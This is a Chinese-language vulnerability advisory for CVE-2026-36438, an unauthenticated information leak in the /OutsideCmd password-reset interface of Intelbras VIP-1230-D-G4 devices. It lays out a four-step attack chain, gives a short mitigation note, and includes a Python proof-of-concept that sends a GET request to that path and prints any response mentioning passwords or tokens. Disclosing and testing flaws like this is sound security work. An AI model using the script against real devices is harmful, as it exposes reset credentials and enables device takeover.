CVE-2026-36438 CVSS 5.3 中危

CVE-2026-36438 Intelbras信息泄露漏洞

披露日期: 2026-05-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-36438

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Intelbras VIP-1230-D-G4

漏洞概述

Intelbras VIP-1230-D-G4设备V2.800.00IB00C.0.T版本存在信息泄露漏洞。由于/OutsideCmd路径下的密码重置功能存在权限配置错误，未经身份认证的远程攻击者可利用该漏洞直接获取设备敏感信息，严重威胁用户数据隐私及系统机密性。

技术细节

该漏洞的核心在于Intelbras VIP-1230-D-G4设备Web服务器对/OutsideCmd目录下密码重置接口的访问控制失效。在受影响版本V2.800.00IB00C.0.T中，该接口未在处理请求前验证用户的会话状态或身份凭证。攻击者只需向目标服务器发送特定的HTTP请求至该端点，即可触发后端逻辑。由于缺乏必要的输入验证和权限检查，服务器会将本应受保护的敏感信息（如密码重置令牌或用户数据）直接返回给请求者。这种漏洞利用了业务逻辑中的设计缺陷，使得攻击者能够以极低的成本获取关键信息，进而可能发起更高级的攻击，如完全接管设备账户。此类漏洞在IoT设备中较为常见，通常源于开发过程中对安全性的忽视。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别出Intelbras VIP-1230-D-G4设备及其Web管理接口。

STEP 2

2. 漏洞利用

攻击者向目标设备的/OutsideCmd路径发送特制的HTTP请求，尝试触发密码重置功能。

STEP 3

3. 信息获取

由于缺乏认证，设备返回包含敏感信息（如密码重置凭证）的响应数据。

STEP 4

4. 后续攻击

利用获取的敏感信息重置密码或登录设备，进一步控制设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://<target_ip>/OutsideCmd"

# Send request to the vulnerable endpoint
# Note: The specific parameters may vary based on the actual implementation
def check_poc(ip):
    url = f"http://{ip}/OutsideCmd"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
    }
    
    try:
        response = requests.get(url, headers=headers, timeout=5)
        
        # Check if sensitive information is leaked in the response
        if response.status_code == 200 and ("password" in response.text.lower() or "token" in response.text.lower()):
            print(f"[+] Vulnerability detected at {url}")
            print(f"[+] Response content: {response.text[:200]}")
        else:
            print(f"[-] Vulnerability not detected or site is down.")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target_ip = "192.168.1.100" # Replace with actual target IP
    check_poc(target_ip)

影响范围

Intelbras VIP-1230-D-G4 V2.800.00IB00C.0.T

防御指南

临时缓解措施

如果无法立即升级固件，建议暂时关闭设备的远程Web管理功能，或通过ACL（访问控制列表）仅允许受信任的内网IP地址访问设备管理界面，以降低被远程攻击的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表